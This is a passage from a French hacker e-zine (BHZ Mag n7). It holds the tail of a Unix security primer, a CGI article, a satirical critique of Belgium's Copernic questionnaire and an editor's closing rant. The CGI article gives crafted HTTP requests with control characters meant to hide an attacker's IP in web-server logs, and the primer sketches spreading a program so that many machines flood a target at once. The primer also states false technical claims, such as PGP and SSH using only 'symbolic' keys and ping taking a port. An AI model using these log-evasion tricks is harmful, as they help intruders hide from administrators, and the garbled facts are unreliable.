	Afin de reperer facilement les programmes cheval de Troie, utilisez Tripwire (http://www.visualcomputing.com)

	Les backdoors : j'ai aussi ecrit un article l dessus dans BHZ Mag n4, je ne repeterai pas la dessus, ces programmes servent, une fois connecte en tangt que root  laisser un moyen de se reconnecter par apres en root.

	Les denials of service : les attaques de type denial of service (DoS ou DDoS) visent  provoquer un plantage de l'hote. Des qu'un port est ouvert, cela signifie que l'on poeut vous attaquer l dessus. Par exemple : 
# ping -f micrososft.com 80
Cette commande va pinger le serveur microsoft.com sur le port 80 mais comme ce type d'attaque est en faite un envoi en masse de paquets de donnees, il n'est pas tres difficile de repere l'attaquant en verifiant les logs. Une autre facon d'utiliser les DoS serait de repandre un programme parmi des milliers d'utilisateurs, programme qui s'executerait  un moment precis sur toutes les machines et effectuerait la commande ping. Ainsi l'attaquant en question n'aurait meme pas besoin d'utiliser la commande et les personnes ayant utilise eux cette commande  leur insu seraient beaucoup plus nombreuses.

	Les daemons : ce sont des processus executes en taches de fond par root. Ils sont souvent la cible des attaquants. C'est pour ca qu'il faut veiller  ne garder que les daemons essentiels au bon fonctionnement du systeme. le nom d'un daemon est souvent "nom du protocole+d" (exemple : le daemon ftpd utilmise le protocole ftp).

	Analyse des ports : c'est generalement une des premieres etapes pour un hackeur que de tester les ports ouverts sur un hote distant. nmap sert  analyser les ports, il utilise le fichier /etc/services.

	Desactivation de certaines commandes : des commandes comme rlogin, rsh et rcp sont inutiles car elles peuvent etre remplacees par d'autres, notamment SSH (Secure Shell).

	Afin d'etre toujours au courant des failles de securite de logicielos, je vous conseille de vous abonner  des mailing-lists (listes de diffusion) concernant la securite des systemes UNIX ou Linux.

	Cryptographie : comme cela fait partie du theme de cet article, je vais en parler un peu : il existe deux methodes de cryptographie : cryptographie  cle symbolique (les deux personnes ont la meme cle) et cryptographie  cle publique (la cle est divisee en deux parties). PGP et Secure Shell utilisent tous les deux les cles symboliques comme methode de cryptage.
	Les fichiers journaux : si vous avez des doutes  propos d'une intrusion ou autre chose, verifiez les fichiers suivants : /var/adm/messages/ et /var/adm/syslog/.

	Si on reprend tout depuis le debut : il existe deux differents types d'attaques, il vous faut accorder les bonnes autorisations aux fichiers avec la commande chattr, il est conseille d'utiliser la cryptographielors des connections de donnees, il vous faut securiser vos sessions aves Secure Shell et vos mails avec PGP, vous abonner  des listes de diffusion concernant la securite de votre systeme ou visiter regulierement des sites qui en parlent.

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


	********************************
	* les requests des scripts CGI *
	********************************

Auteur : wHyAnGeL 
Date : 04.08.00 
Titre : Les request des scripts CGI. 
Les request sont des demandes faites par la machine cliente. Cet article dmontre quelques exploits en raport avec les CGI. 

C'est une caractristique inhrente propre  quelques serveurs web, tel que Apache 1.3.x ou Microsoft IIS. 

Ces lgers transports d'implications de scurit autoriseraient des attaques invisibles, donc intraables aux serveurs web. 
Le problme associ aux "allowable" REQUEST_METHODs (les mthodes de demandes autorises) quand une ressource dynamique, tel qu'un script CGI est demand. Essentiellement toutes les mthodes de demandes (except HEAD, TRACE et OPTIONS) peuvent tre utilises, mme les mthodes non dfinies dans le protocole HTTP. 

Envisagez que la demande qui suit retourne toutes les ressource demandes : 

GET /cgi-bin/environ.cgi HTTP/0.9 

Azx5T8uHTRuDL /cgi-bin/environ.cgi HTTP/1.0 

Mme le contrle des caractres est permis, alors envisagez ceci : 

^H^H^H^H^H^H^H^H^H_ENCORE_BEAUCOUP_PLUS_^H^H /cgi-bin/environ.cgi HTTP/1.1 

Un attaquant (un script kiddie) pourrait mettre cette demande dans l'intention de cacher ces mouvement sur l'hte. Quand cette demande est logge dans l'access log et visionne en utilisant 'cat' , et, les script visits apparatront sans votre IP. 

# cat /var/log/httpd/access_log 

ou 

# more /var/log/httpd/access_log 

Ces deux commandes cites ci-dessus rvellent : 

10.20.20.1 - - [05/Jan/1999:18:00:00 GMT] "GET / HTTP/1.0" 200 1098 

/cgi-bin/environ.cgi HTTP/1.1" 200 2034 

10.20.20.2 -- [05/Jan/1999:18:01:00 GMT] "GET /index.html HTTP/0.9" 200 1098 

Utilise une mthode similaire, si c'est possible, pour un attaquant pour faire apparatre l'attaque comme si elle provenait d'une autre IP ou pour enlever compltement les vraies informations logges en dsignant un certain contrle de caractre dans la QUERY_STRING aussi (la ligne de demande de restitution d'information extraite d'une banque de donne). 

Je l'ai test sur Apache 1.3.3, sur RedHat 5.2, sur Apache 1.2.7, sur RedHat 5.0, Microsoft's Internet Information Server 2, 3 et 4, mais dans l'environement NT, ce n'est pas ncessaire, parce que l'on peut diter le fichier log avec notepad et par l, effacer toute traces de passages. 

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


	***********************************
	* La chtite pensee anarchique n2 *
	***********************************


                               \\\|///
                               -(o o)-
      ___________________oOOOo__(_)__oOOOo_________________
     \      Underground Production      /
    /---------------------------------------------------\
   /    [ La chtite pense ananarchique 2 Le RETOUR ]    \
   \     GRIm@, L'Apprenti Sorcier  Proudly Present      /
    \---------------------------------------------------/
     /LES NEWBIES D'AUJOURD'HUI SONT LES 3L33T3 DE DEMAIN\
      \___________________________________________________/


[adminn@remotehost]# m0D3 0n: G3l4p4              d0N3
[gelapa@remotehost]# M0d3 0N: wH4T d4 FuCk        D0n3
[gelapa@remotehost]# k1lL 3cR1tUr3 d3 C0wB0y5...  Done
[gelapa@remotehost]# launch cervaux...            Done

H oui, me revoil !!! Cette fois-ci zte foutu... Aprs ce superbe
ASCII encore mieux que la fois dernire, revoici revoil la chtite 
pense ananarchique !?!
Arf, le concept reste le mme (voir BHZ mag #6), mais cette fois-ci
je vais vous parler d'un truc tout a fait srieux (barf, mais toujours
avec humour lger et discret (vous tes foutu, je l'ai dit)...

ADISCLAIMER
----------
Ce texte contient de vrai morceaux de connerie, s'il vous prend l'envie
d'tre con, c'est votre problme...
Ce texte est lgal (pour autant que je sache, mais on sait jamais ;-) )
---------------
EOF ADISCLAIMER

Comme d'hab il est dconseill d'utiliser des aditifs avec cet articles,
genre bon sens, intelligence, esprit critique et autres... Je vous 
conseille donc de dbrancher ces plugin inutile et emcombrant pour votre 
esprit afin de librer quelques cycles CPU...

  <TITLE> System 2 System (or what da feucking syst3m) </TITLE>

Mais vous aller me dire de koi vas-t'on parler ? ben oui, j'ai
dit qu'on parlerai de qqchose de srieux, mais n'ayez aucune crainte,
ca SERA TRS ennouyeux ;-). Bref pour en venir au fait et ne pas 
discourir dans le vide sans but ni echapatiore, ainsi que pour ne
pas vous faire attendre ni se drober nous allons parler de... tadam...
(jvous l'ai dit, VOUS ETES FOUTU !!! :-)..) Le Projet Copernic !!!
Pour ceux qui savent pas ce que c'est voici un petit encart qui vous
est destin (les autres saut le, enfin pas littralement si possible):
---------------------------------------------------------------------
Le Projet Copernic est encore un belgicisme risible qui fait que les
blagues sur nous marchent si bien. En effet, certain ministre dont je
ne citerai pas la nom (et encore moins le parti; PD !! HAHA kel con 
ce duqenne ;-) se sont dit qu'il serait peut-tre temps de dpoussierez
l'administration. Arf, tout a fait d'accord avec eux, remmetre a niveau
une administration vielle de 2 sicles il faut le faire. Mais alors
con comme il sont, il ont envoy a presque tous les belges de plus de
16 ans un questionnaire avec des questions (non, vraiment ???). Ce 
n'tait ni un rfrendum, ni une pub, juste une double feuille avec des
questions sur le fonctionnement de l'administration que nous pensions
devoir avoir... (Note, y'a eu 7 millions de forumlaires envoy sur
10 millions d'habitants) Bref, on continue:
---------------------------------------------------------------------
Donc ces chers ministres arc-en-ciel nous envoient leurs putains de 
questionnaires qui vont couter 10 millions  l'tat. Mais voil, le
questionnaire est bourr d'incohrence, de fausses questions, ainsi
que de question pas trs claires et des truc un peux bizzare. Ayant 
recu ce questionnaire, je vous file une copie des questions:
(Y'avais 2 feuilles, voici la premire, aprs la deuximes:)
Note: chaque question tait accompagne de 5 case  cocher,
-tout  fait d'acord
-d'accord
-sans opinion
-pas d'accord
-pas du tout d'accord
sense reprsent l'avis gnral et entier de la personne sur le
sujet...
Note2: Sur la deuxime feuille seule la question 1 avait ce type
de rponse, j'ai not le type de cotation pour les autres questions

----------
|        |       Donnez votre opinions sur les orientations du plan:
|   .BE  |
|Belgique|
---------- 1. Le gouvernement doit tablir les lignes de force mais les
| Le Plan|    fonctionnaires peuvent dcider eux-mmes pour la gestion 
|        |    journalire
|COPERNIC|
|        | 2. Les fonctionnaires de l'administration sont dsign pour
|        |    priode limite (titulaires de mandat).
|        |
|        | 3. L'administration publique veut attirer les collaborateurs
|        |    les plus comptent pour ces fonctions dirigeante et doit
|        |    s'ouvrir au candidats tant internes que externes.
|        |
|pour  la| 4. Les personnes exerant une fonction dirigeante doivent
|moderni-|    tre valu en fonction de leurs rsultats. Ces rsultat
|sation  |     atteindre sont dfinis au pralable
|de l'   |
|admini- | 5. Les cabinets sont supprim et remplac par des cellules
|stration|    stratgiques au sein de l'administration et par un petit
|fdrale|    secrtariat personnel au service de chaque ministres
|        | 6. Chaques service fdral doit donner des garanties de
|        |    qualits pour la fourniture de service
|________|

----------
|        | 1. Le dpliant qui accompagne ce questionnaire reprend la
|   .BE  |    philosophie de base pour la modernisation de 
|Belgique|    l'administration fdrale.
----------    Dans quelle mesure tes-vous d'accord ou non sur cette
| Le Plan|    proposition ? (NOTE: ce dpliant en gros explique la mme
|        |    chose que le questionnaire 1)
|COPERNIC|
|        | 2. Comment voudriez vous communiquer  l'avenir avec
|        |    l'administration publique ?
|        |    (Donnez des points de 1  8, 1 tant le meilleur score)
|        |
|        |    -Lettre                         -par le biais de la commune
|        |    -tlphone                      -contact personnel
|        |    -internet  domicile            -tltexte interactif
|pour  la|    -internet dans une bibliothque -internet
|moderni-|
|sation  | 3. A quoi attachez vous le plus d'importance dans l'attitude
|de l'   |    des fonctionnaires.
|admini- |    (Donnez des points de 1  4, 1 tant le meilleur score)
|stration|
|fdrale|    -convivialit               -tre  l'coute des gens
|        |    -traitement gal pour tous  -respect de la vie prive
|        |
|        | 4. Quelle amlioration du service publique jugez-vous
|        |    prioritaire ?
|        |    (Pour le classement vois ci-dessus)
|        |
|        |    -rapidit du service       -simplicit des procdures
|        |    -qualit du service        -disponibilit
|        |
|        | 5. La promotion des fonctionnaires doit se faire sur une base
|        |    et dpolitise. De quoi doit-on le plus tenir compte,
|        |    selon vous ?
|        |    (indiquez vos priorits de 1  3)
|        |
|        |    -Slection en fonction des annes de service
|        |    -Slection en fonction du diplme
|        |    -Slection en fonction des comptence
|________|

Bon voil, maintenant je vais critiquer et/ou rpondre  chaque questions
les unes aprs les autres...

Question 1 : Arf, ben je pense bien que je suis d'accord, comment veut-tu
que le gov puisse grer la gestion journalire des 20.000 agents du service
publique. Remarquez que c'est pas vraiment une question, puisqu'il n'y a 
qu'une rponse possible

Question 2 : Pkoi il sont nomm  vie sinon ?

Question 3 : Ha c'est vrai que dans l'administration ont choisi toujours 
les plus incomptent de ses sous-services pour diriger. Encore une question
ou on nous force la main

Question 4 : Lol, non on vas plutot les valuer aux nombres d'heures
preste ;-). En plus si les rsultat  atteindre n'tait pas fix  
l'avance, comment voulez vous les obtenir puisque vous ne cherchez pas 
 les atteindre (Encore une question force)

Question 5 : Heu ouais pkoi pas, c pas mal. Mais  propos, les cabinets 
l'origine, c'est pas justement des petit secrtariat personnel au service 
du ministre ? ;-)

Question 6 : Ha c'est vrai que je suis pas du tout d'accord avec cette
affirmation, surtout pas me donner des garantie de qualit, ha ca non !

Remarquez que sur 6 questions, pour l'instant aucune n'en rellement une,
en effet toute sont oriente de telle sorte qu'on ne puisse rpondre qu'une
seule chose (sauf si vous travailler  l'administraion videmment ;-)
Bon maintenant passons  la feuille 2:

Question 1 : Arf, ben ouais j'suis d'accord, pkoi j'ai le chois ? ;-)

Question 2 : Ha l, ca m'a fait bondir ! H oui, seule 3 des 8 
propositions ne sont pas payantes... Rflchissez, le tlphone, 
internet chez vous ou  la biblio ou  la poste (mme les biblio font 
payer maintenant), le tltexte (ben oui faut avoir une tl et un 
abonnement)... Seule le contact direct, par le biais de la commune ou la
lettre ne reprsente qu'un cout minime pour les personne qui ont le plus
besoin des services publiques, les sans-papier, les sdf et autres. 
Finalement avec toutes ces propositions ou internet apparait partout,
on empche l'accs aux services PUBLIQUE par les personnes qui ne 
possdent pas les moyen financier de se procurer ces moyens 
technologique. En fait donc cette question peut amener  une violation
de l'article 2 du code pnal disant que tout les belges sont gaux !

Question 3 : Arf, dj y'a 3 des 4 propositions qui sont obligatoire,
l'coute (ben ouais vous leur demandre qqch il faut qu'il le fassent, 
c'est avec vos impot qu'ils sot pay non ?!!), le traitement gal
pour tous (c'est la loi), et le respect de la vie prive (paske ces
connards veulent nous espionner en plus ;-). Finalement il ne reste
qu'une proposition qui, comme elle est facultative, pourrait tre 
amliore, la convivialit. En gros cette question au fond demande si
on veut que les agents soit plus conviviaux ou pas... et puis quoi 
encore bien sure que non !! (tss il sont btes ces ministres) ;-)

Question 4 : Ben tient tout les 4 bien sur, y'en a pas une de +
prioritaire, ces 4 choses devrait tre fournis  la base... !!

Question 5 : Pkoi, la promotion des fonctionnaires ne se fait pas sur une 
base objective maintenant ? C'est sur qu'il faut tenir compte des annes
de service  ne rien faire dans le bureau pour les promotions, pff avoir
des comptence ou un diplme ca sert  rien...

Bref, je pense que vous avez bien vous ou se tenait la fourberie de ce
questionnaire, j'spre maintenant que le gouvernement y repensera 
deux fois avant d'envoyer des questions aussi stupide. Notez d'ailleur
que ce rfrendum a fait un big flop, en effet seul 20.000 personnes
sur les 7.000.000 questionne ont rpondus (tient, vingt mille, c'est pas
justement le nombre d'employ  la fonction publique ;-) ? )

Bon voil, j'spre que cet article a dfaut d'avoir servit a remplir un 
peux plus le mag vous aura un peux ouvert l'esprit et dvelop votre sens
critique.
Souvenez vous que la dictature n'est jamais loin, et que la citoynet, et
la libert ne sont pas des droits, ce sont des devoirs,  accomplir
chaque jour.


-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________

	Bon voil, BHZ Mag n7 est termine, et je ne sais pas trop quoi mettre comme mot de la fin, en plus j'ai pas d'inspiration, je n'en suis qu' ma deuxieme Jupiler, GRIm@ est meilleur que moi aux Echecs-VMB, j'ai ecrit que deux articles pour ce zine et les cours recommencent dans quelques jours. Et en plus j'ai renverse un peu de biere  terre  cause de Jonhatan Davis et son groupe et leur super musique que j'adore. Mais bon l je suis en train de deraper sur un sujet qui n'est pas celui sense etre aborde par ce zine, de toute facon il est inutile de preciser que KoRn est le meilleur groupe au monde, cela a ete prouve. (Et non GRIm@ ce n'est pas Queen le meilleur groupe :)) Enfin bon, cette fois-ci je ne vais pas encore sortir une de mes habituelles elucubrations sur l'etat de la scene en Belgique francophone ou en Belgique tout court, voire dans le monde. De toute fracon, personne n'en tient compte et si ca se trouve personne ne les lit, mais j'en ai rien  foutre. En somme je devrais ecrire un truc du genre "Pourquoi faisons nous ce que nous faisons ?" comme mot de la fin. Oui cela me semblerait approprie. Cela serait plus simple si la question avait ete "Pourquoi! sommes nous ce que nous sommes ?" J'y aurais repondu, parce que Vous nous avez fait comme ca, oui Vous le peuple, le monde, les humains, ah ca c'est clair que ca le fait  donf, ca donne tout de suite une petite ambiance anarchiste, mais bon, ne deconnons pas, qui aujourd'hui peut se targuer de hacker uniquement des sites pedophiles, nazis, etc... (encore faudrait il y arriver) Non, si on fait ca (du moins si moi je le fais) ce n'est pour aucune raison, juste comme ca ; pour passer le temps, parce que j'ai envie, pour faire le malin, pour m'amuser, il m'arrive quand meme quelque fois (rarement) ou c'est pour une noble cause, mais bon, le hacker-qui-hacke-des-sites-pedos-et-nazis c'est une image. Une belle image certes, mais ca reste une image. Pas la peine de disserter l dessus, mon premier "hack" (mais en etait ce vraiment un ?) c'etait envers quelqu'un que je n'aimais pas trop et qui m'avait passablement enerve (bon ok j'etais tres jeune dans le temps donc c'est excusable). Mais reprenons l'image du hacker solitaire qui se bat contre la pornographie et le nazisme, c'est quand meme un sentiment de haine, de la haine envers ce qu'il considere comme immoral. Alors  partir de l on pourrait considere que tout hack, qu'il soit "White Hat" ou "Black Hat" (je ne sais pas vous mais moi je deteste ces expressions) est base sur la HAINE, il ne faut blamer personne, c'est un sentiment purement humain que celui de haine, difficile de le renier,  moins de s'appuyer sur une puissance superieure imaginaire (Dieu, etc...) Ce sentiment est omnipresent dans nos vies et donc aussi dans le hack, Ce qui est amusant c'est que le hack ou piratage informatique est une activitee consideree comme illegale, mais dans ce cas, toute activite humaine devrait etre consideree comme illegale, seuls certains sentiments devraient subsister, l'amour l'amitie, les trucs du genre, tout le reste serait illegal. La Vie en elle meme serait, si on suit ce raisonnement, illegale, Nous sommes tous des illegaux (terme utilise pour designer les personnes residant illegalement en Belgique) Ainsi, si l'on s'entretue (ce qui risque d'arriver tres bientot) cela ne sera que pure vengeance, chacun aura toujours quelque chose  reprocher  son voisin, son frere, son pere, son meilleur ami, et l, on aura tous draoit au chaos et  l'anarchie totale, tout cel grace  la nature humaine. Cool.